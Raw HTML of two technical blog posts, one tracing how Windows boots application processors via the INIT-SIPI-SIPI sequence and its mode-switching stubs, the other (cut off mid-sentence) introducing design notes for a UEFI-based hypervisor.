HalpInterruptStartProcessor builds stub code and temporal data structures required for APs to go through real-mode, 32 bit protected-mode, and long-mode, such as page tables, GDT, and IDT. HalpLowStub (that is PROCESSOR_START_BLOCK according to <a href="http://alex-ionescu.com/publications/Recon/recon2017-bru.pdf" target="_blank">this talk by Alex Ionescu</a>) is the address of where those are build and the very entry point of the AP. We will review the entry point code and how it goes up to the NT kernel. </div>
<div>
<br /></div>
<div>
HalpInterruptStartProcessor, after the stub is built. executes HalpApicStartProcessor which is responsible for issuing the INIT-SIPI-SIPI sequence. Pseudo code of this function is shown below.</div>
<div>
<br /></div>
<div>
<div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 12px; line-height: 16px; white-space: pre;">
NTSTATUS
<span style="color: #dcdcaa;">HalpApicStartProcessor</span>(
UINT64,
UINT32 <span style="color: #9cdcfe;">LocalApicId</span>,
UINT64,
UINT32 StartupIp
)
{
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Assert INIT, then de-assert it. INIT-deassert IPI is done only for backword</span>
<span style="color: #6a9955;">// compatibility.</span>
<span style="color: #6a9955;">// See: 10.4.7.4 Local APIC State After It Receives an INIT-Deassert IPI</span>
<span style="color: #6a9955;">//</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, <span style="color: #b5cea8;">0xC500</span>); <span style="color: #6a9955;">// APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT</span>
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">10u</span>);
<br />
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, <span style="color: #b5cea8;">0x8500</span>); <span style="color: #6a9955;">// APIC_INT_LEVELTRIG | APIC_DM_INIT</span>
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
<br />
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Compute the SIPI message value and send it.</span>
<span style="color: #6a9955;">// "the SIPI message contains a vector to the BIOS AP initialization code (at</span>
<span style="color: #6a9955;">// 000VV000H, where VV is the vector contained in the SIPI message)."</span>
<span style="color: #6a9955;">// See: 8.4.3 MP Initialization Protocol Algorithm for MP Systems</span>
<span style="color: #6a9955;">//</span>
sipiMessage = (StartupIp & <span style="color: #b5cea8;">0xFF000</span> | <span style="color: #b5cea8;">0x600000u</span>) >> <span style="color: #b5cea8;">12</span>; <span style="color: #6a9955;">// APIC_DM_STARTUP</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, sipiMessage);
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
<span style="color: #dcdcaa;">HalpApicWaitForCommand</span>();
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">100u</span>);
<br />
<span style="color: #6a9955;">//</span>
<span style="color: #6a9955;">// Send the 2nd startup IPI.</span>
<span style="color: #6a9955;">//</span>
<span style="color: #dcdcaa;">HalpApicWriteCommand</span>(LocalApicId, sipiMessage);
<span style="color: #dcdcaa;">KeStallExecutionProcessor</span>(<span style="color: #b5cea8;">200u</span>);
</div>
</div>
<div>
<br /></div>
<div>
Note that those HalpApic functions are the function pointers that are set for APIC or APICx2 according to the system configurations.</div>
<div>
<br /></div>
<div>
Then let us review how APs get initialized by following the stub code.</div>
<div>
<br /></div>
<div>
<h2>
AP Initialization Code</h2>
<h3>
HalpRMStub - Real-Mode </h3>
</div>
<div>
<br /></div>
<div>
The entry point code is symbolized as HalpRMStub. As the name suggests, running in the real-mode, right after the SIPI. As seen in the screenshot below, the stub code sets CR0.PE (0x1) enabling the protected mode and jumps out to somewhere.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdKo6-TnYFTWRYM_HxMgJBlHpT0RDuG4nEHcoWQN60Mo7SqyqjN_lOppagqcbsue6h1HIJQbCLMKhgkilhoCoYvYLWrgDbSNeABIFWV29oLQpswODCbFwtnGecW58Kh9TW2wCUt9oq3U/s1600/Annotation+2020-02-24+190219.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="938" data-original-width="1600" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdKo6-TnYFTWRYM_HxMgJBlHpT0RDuG4nEHcoWQN60Mo7SqyqjN_lOppagqcbsue6h1HIJQbCLMKhgkilhoCoYvYLWrgDbSNeABIFWV29oLQpswODCbFwtnGecW58Kh9TW2wCUt9oq3U/s400/Annotation+2020-02-24+190219.png" width="400" /></a></div>
<div>
<br /></div>
<div>
As it is 16bit code, the instructions show by Windbg is slightly broken. Below is the correct output.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6KPl7UT4nDLXlq33a0QemoRJ7wT1_EiJIp8HOuW66sX7xUDaFRwlBxfV6hvSfr6kWhOJKFCls7MzIQxD9iNYKe2wmu821aZCVStsnn-TpbuVVe_K6ITDIyBVdc8BCJKNsrk7qBApJEhc/s1600/Annotation+2020-02-24+190629.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="291" data-original-width="1395" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6KPl7UT4nDLXlq33a0QemoRJ7wT1_EiJIp8HOuW66sX7xUDaFRwlBxfV6hvSfr6kWhOJKFCls7MzIQxD9iNYKe2wmu821aZCVStsnn-TpbuVVe_K6ITDIyBVdc8BCJKNsrk7qBApJEhc/s400/Annotation+2020-02-24+190629.png" width="400" /></a></div>
<div>
<br />
Also, let us switch to physical addresses since the code runs in the real-mode.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsybIAYQgiyTlGXcv35mXeEO2JvqaNZpnqPXcI0_ITYtq5q9W-FVBL9V7aWJRNvCdW6JzcQSuet46F-_ajGUfRCnQ19JYSE7HmltlY2JtP8n2VLn_99-Fp5srJeZEHl4T3_8-3nDjEcQ/s1600/Annotation+2020-02-24+211858.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="624" data-original-width="1425" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsybIAYQgiyTlGXcv35mXeEO2JvqaNZpnqPXcI0_ITYtq5q9W-FVBL9V7aWJRNvCdW6JzcQSuet46F-_ajGUfRCnQ19JYSE7HmltlY2JtP8n2VLn_99-Fp5srJeZEHl4T3_8-3nDjEcQ/s320/Annotation+2020-02-24+211858.png" width="320" /></a></div>
<br />
From code, the value of EDI is known to be 0x13000, because EDI is CS << 4, and CS is [19:12] of the IP, as stated in 8.4.3 (see the comment in the above pseudo code).<br />
<br />
<h3>
HalpPMStub - Protected-Mode </h3>
<br />
Following EDI+0x60 navigates us to the protected mode stub implemented as HalpPMStub.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNwyYT1p1KVZn2BgIAlL-0WMEhQckzSQ5j7zquhhosv4qw6TxHwouJSaqXNkRlOoTFMtL_flCOp4kIGpkSKZdbXUv0j7YEOuaITwEw2ZDnlWOVhvIIPtGfMY3HNn2tqfJfMaGHc_svhMc/s1600/Annotation+2020-02-24+212449.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="1212" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNwyYT1p1KVZn2BgIAlL-0WMEhQckzSQ5j7zquhhosv4qw6TxHwouJSaqXNkRlOoTFMtL_flCOp4kIGpkSKZdbXUv0j7YEOuaITwEw2ZDnlWOVhvIIPtGfMY3HNn2tqfJfMaGHc_svhMc/s320/Annotation+2020-02-24+212449.png" width="320" /></a></div>
<br />
This code is responsible for switching to the long-mode. As seen below, it<br />
<ul>
<li>sets CR4.PSE (0x1000),</li>
<li>updates IA32_EFER, then</li>
<li>sets CR0.PG (0x8000000), to activate the long-mode (see the second screenshot).</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftn246wcF9_dd_a_KoXlCZOnfpV8DcgOSNEx9yGoJjOWrSrSYIVKnt-QdrkYbq88psPmkupDU_yiaUoDW3GWB9A0WJKMHlNlEYnPJtO8s8Rh5JKy-d4up66lB65Qd5yDC0w6DTgf1fSU/s1600/Annotation+2020-02-24+214116.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="549" data-original-width="1212" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgftn246wcF9_dd_a_KoXlCZOnfpV8DcgOSNEx9yGoJjOWrSrSYIVKnt-QdrkYbq88psPmkupDU_yiaUoDW3GWB9A0WJKMHlNlEYnPJtO8s8Rh5JKy-d4up66lB65Qd5yDC0w6DTgf1fSU/s320/Annotation+2020-02-24+214116.png" width="320" /></a></div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdjfN1DGhe4PKkgxKZO_2DZIIVXiQq5Ns4UI64I_lgmr1vBS0L88he_hUV5wh7HdSU1s5IvGN-O69SbsohxMQzyd4UOwAzYrrd9g3UJbYkEdR8PYxWnvXJtgLDKLT_U9nM8ZdUlYnEFo0/s1600/Annotation+2020-02-24+214509.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="147" data-original-width="1194" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdjfN1DGhe4PKkgxKZO_2DZIIVXiQq5Ns4UI64I_lgmr1vBS0L88he_hUV5wh7HdSU1s5IvGN-O69SbsohxMQzyd4UOwAzYrrd9g3UJbYkEdR8PYxWnvXJtgLDKLT_U9nM8ZdUlYnEFo0/s320/Annotation+2020-02-24+214509.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Then, it jumps out to where RDI+0x66 specifies. </div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlLas_-v-TaSOU7k102shk1PRWPqxgL2p0tiEn0hyphenhyphenXX00vdRbtGi-0lsGtOLP64R6WIpz_M62LUZzrvQGFOzxdZOs3p7-mErRTEON3xRLKsgOl9mDRg5l8ODmJUgk20G8wGuVZPik68s/s1600/Annotation+2020-02-24+214942.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="1368" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlLas_-v-TaSOU7k102shk1PRWPqxgL2p0tiEn0hyphenhyphenXX00vdRbtGi-0lsGtOLP64R6WIpz_M62LUZzrvQGFOzxdZOs3p7-mErRTEON3xRLKsgOl9mDRg5l8ODmJUgk20G8wGuVZPik68s/s320/Annotation+2020-02-24+214942.png" width="320" /></a></div>
<br />
<h3>
HalpLMIdentityStub - Long-Mode under Identity Mapping</h3>
<br />
The JMP leads to the short stub whose sole responsibility is to retrieve the value of CR3 that can permanently be used, that is, the same value as that of BSP.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-daLmPm6bfIKRSpSpbZB2Od9391rPCAqIhqEA37pqSO4lR8uUh73Cj_d9tkBLNWhPrsvcX_TtBLobSzhQWDk9ITxjegeToi7wUvnNwMz9w4nXLWrpb6N3fCNbgtCWe2sWwLvN0bI1wSo/s1600/Annotation+2020-02-24+215451.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="281" data-original-width="1600" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-daLmPm6bfIKRSpSpbZB2Od9391rPCAqIhqEA37pqSO4lR8uUh73Cj_d9tkBLNWhPrsvcX_TtBLobSzhQWDk9ITxjegeToi7wUvnNwMz9w4nXLWrpb6N3fCNbgtCWe2sWwLvN0bI1wSo/s320/Annotation+2020-02-24+215451.png" width="320" /></a></div>
<br />
As the processor should already working with the virtual addresses, let us switch to it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGuV0XqwnqYfH6BSxGdGncMZeHGmktEq42CXeolTI0RwvtZXQ833nqSodWkPnq4Haksu49lQHn_el-SVLDHNrKrjUQnkWeP5HRExyokzzkjB5Rrda-3tmAyrPSVVfEABPEVIEHk7c-Ro/s1600/Annotation+2020-02-24+215858.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1275" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGuV0XqwnqYfH6BSxGdGncMZeHGmktEq42CXeolTI0RwvtZXQ833nqSodWkPnq4Haksu49lQHn_el-SVLDHNrKrjUQnkWeP5HRExyokzzkjB5Rrda-3tmAyrPSVVfEABPEVIEHk7c-Ro/s320/Annotation+2020-02-24+215858.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
RDI+0x70 gives us HalpLMStub.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje12Uimgg4QyXGm_gBisJ7Xqp8VlsRDGh2hyphenhyphenASpe0LFY1yhghde-hVX0gb5HyeBzj_D9YXumiIrV6Ug3oBhmYh4we4QEsC9iuKrD1fRDtYNPRsL8YIH-afv-S0RYSFfh2HYFU9JZ1qrc4/s1600/Annotation+2020-02-24+220143.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="120" data-original-width="1365" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje12Uimgg4QyXGm_gBisJ7Xqp8VlsRDGh2hyphenhyphenASpe0LFY1yhghde-hVX0gb5HyeBzj_D9YXumiIrV6Ug3oBhmYh4we4QEsC9iuKrD1fRDtYNPRsL8YIH-afv-S0RYSFfh2HYFU9JZ1qrc4/s320/Annotation+2020-02-24+220143.png" width="320" /></a></div>
<br />
<h3>
HalpLMStub - Long-Mode</h3>
<br />
This is the final stub that APs go through. The first thing this stub does is to apply the permanent CR3 value to have the same memory layout as BSP (and any other already initialized APs) followed by invalidation of TBLs.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDczQqkwhL-VO-3SgX7y0hGaozd9vUAAoAcV22_KLLDYdwIIWxboeYGS6GOf0-25V0-clWNVwShfn4Er5VocSQce3nuL3Xm2bnVY4WtZW7uv97TJuQKdAon1vpX5bVOIkmj2R2meG9yfw/s1600/Annotation+2020-02-24+221146.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="1563" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDczQqkwhL-VO-3SgX7y0hGaozd9vUAAoAcV22_KLLDYdwIIWxboeYGS6GOf0-25V0-clWNVwShfn4Er5VocSQce3nuL3Xm2bnVY4WtZW7uv97TJuQKdAon1vpX5bVOIkmj2R2meG9yfw/s320/Annotation+2020-02-24+221146.png" width="320" /></a></div>
<br />
After switching the page tables, it performs various initialization, and at the end, it jumps out to where RDI+0x278 indicates.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3S7Sa6g_mU1RHZP4r4_SU4ZHzJZFIPfgK9q6sZDxQctCMkuyXKUY9eMzA7txKLWVTgrZG-lbOjw0e7ioVLyFGyhLKxusCALPrMbH-jB0bPPJOqjGrAOlUxzXh1r8SY5AuLY5rNnlydY8/s1600/Annotation+2020-02-24+222135.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1308" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3S7Sa6g_mU1RHZP4r4_SU4ZHzJZFIPfgK9q6sZDxQctCMkuyXKUY9eMzA7txKLWVTgrZG-lbOjw0e7ioVLyFGyhLKxusCALPrMbH-jB0bPPJOqjGrAOlUxzXh1r8SY5AuLY5rNnlydY8/s400/Annotation+2020-02-24+222135.png" width="326" /></a></div>
This ends up with nt!KiSystemStartup, letting the AP run the same initialization code as BSP (except few things done exclusively by BSP).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2Qrx0S0vtaXiN-XZLPwqxAZxhxQ3A9mgdGyovJ5vi23v2YwPLCHSu8Cbmx5o_mn_8mN7TIEgOy8LwvC_LBPB4m9qkY8jGNpdWTGzwTljzdb3Sl_S9fZz_8Vd6p3ENgP8hBjuhUbLleY/s1600/Annotation+2020-02-24+222807.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="119" data-original-width="1600" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2Qrx0S0vtaXiN-XZLPwqxAZxhxQ3A9mgdGyovJ5vi23v2YwPLCHSu8Cbmx5o_mn_8mN7TIEgOy8LwvC_LBPB4m9qkY8jGNpdWTGzwTljzdb3Sl_S9fZz_8Vd6p3ENgP8hBjuhUbLleY/s400/Annotation+2020-02-24+222807.png" width="400" /></a></div>
<br />
<h2>
Conclusion</h2>
</div>
<div>
We reviewed how Windows initiates execution of APs with the INIT-SIPI-SIPI sequence and how APs go though from real-mode to the regular NT kernel initialization function on Windows 10 19H1 without Hyper-V.</div>
<div>
</div>
<div>
Hopefully, you enjoyed this post and gained more contexts on INIT-SIPI-SIPI VM-exits you may see while writing a hypervisor too.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-58316420195176399122020-03-13T07:08:00.000-07:002020-03-13T07:18:24.888-07:00Introduction and Notes on Design Considerations of UEFI-based Hypervisors <span style="font-size: 13.5pt;">In this post, I am going to write up some of the lessons learned and the challenges I had
to go through to write </span><a href="https://github.com/tandasat/MiniVisorPkg" style="font-size: 13.5pt;" target="_blank">a UEFI-based hypervisor that supports booting Windows</a><span style="font-size: 13.5pt;">. I
hope this post gives pointers to study and helps you get started with writing a
similar hypervisor.</span><br />
<div style="margin-bottom: .0001pt; margin: 0in;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hMH_VYgQMPSoEAWjQ6h2mNwyw6_Ny8v6qg95dxzRBxB9ZY7qsys5DypUpOrN1yipfkpxz9f7GfY5lfw3e0TFyEONW2U2Cjb0OHtTdz3AxmOe-iNmOfmAb-8SSuV-qgFjtImO89JXwa8/s1600/IMG_6315.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hMH_VYgQMPSoEAWjQ6h2mNwyw6_Ny8v6qg95dxzRBxB9ZY7qsys5DypUpOrN1yipfkpxz9f7GfY5lfw3e0TFyEONW2U2Cjb0OHtTdz3AxmOe-iNmOfmAb-8SSuV-qgFjtImO89JXwa8/s320/IMG_6315.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">UEFI hypervisor brief design walk-through</td></tr>
</tbody></table>
</div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Background</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Lately, I spent some time to
study EDK2-based UEFI programming and developed a hypervisor as a UEFI driver.
It has been fun and turned out to be more straightforward than I initially
imagined, but at the same time, there were some learning curves and technical
challenges I had to take extra time to understand and overcome.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">The major reason of taking
extra time was lack of write ups or tutorials for my goal. Although there were
few open-source projects and many documents and presentations I was able to
study, those were not focused on UEFI programming with the context of writing
hypervisors. This is entirely understandable as I do not suppose those are
common subjects, and that was also why I wrote up this post.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">In this post, I will start by
giving a high-level overview of UEFI, and unique aspects in its execution
environment, then look into challenges of writing a hypervisor as a
UEFI driver.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;"><br /></span></div>
<h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="font-size: 18px;">UEFI Execution Environment</span></h2>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">UEFI vs EDK2</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">UEFI is the specification of
firmware to replace legacy-BIOS, where no standard exists, and offers a
well-defined execution environment and programming interfaces. EDK2 is the
open-source, reference implementation of the specification and provides tools
to develop firmware modules.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="margin: 0in 0in 0.0001pt;">
<span style="font-size: 13.5pt;">Application vs Driver</span></h3>
<div>
<span style="font-size: 13.5pt;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Firmware modules can be built
as part of a whole firmware image or as a standalone module (file) to be
separately deployed. The latter is how I compiled the module. Additionally,
UEFI modules can be written as an application which is unloaded from memory
once its execution finishes, or as a driver which remains loaded unless explicitly
unloaded. Obviously, the driver is the natural choice for the hypervisor, although I will mention the other common approach later.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Boot Time vs Run Time</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">The execution environment of
drivers can be separated into two different phases: boot time and run time.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Frankly speaking, the boot time
is before execution is handed over to the operating system and the run time is
after that. This transition happens when a UEFI defined API called
ExitBootServices is called. In the case of Windows startup, this is sometime
before winload.efi transfers its execution to ntoskrnl.exe.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Most of the firmware drivers
loaded on memory are unloaded at this point because most of them, for example,
a network driver for PXE boot, are no longer needed once execution is handed
over to the operating system. This type of driver is called boot drivers, and
not suitable for the hypervisor that is meant to stay alive even after the
operating system is fully started.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Runtime drivers, on the other
side, are the type of driver that resides on memory throughout the system life
span and suited for the hypervisor.<o:p></o:p></span></div>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<h3 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="color: black; font-size: 13.5pt;">Boot-time Services vs Run-time
Services</span></h3>
<div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; margin-bottom: .0001pt; margin: 0in; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<br /></div>
<div style="margin: 0in 0in 0.0001pt; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2;">
<span style="font-size: 13.5pt;">UEFI defines a collection of
APIs, and their </span><span style="font-size: 18px;">availability</span><span style="font-size: 13.5pt;"> is impacted by the boot-to-run time transition.
The type of API called boot-time services can no longer be used after the
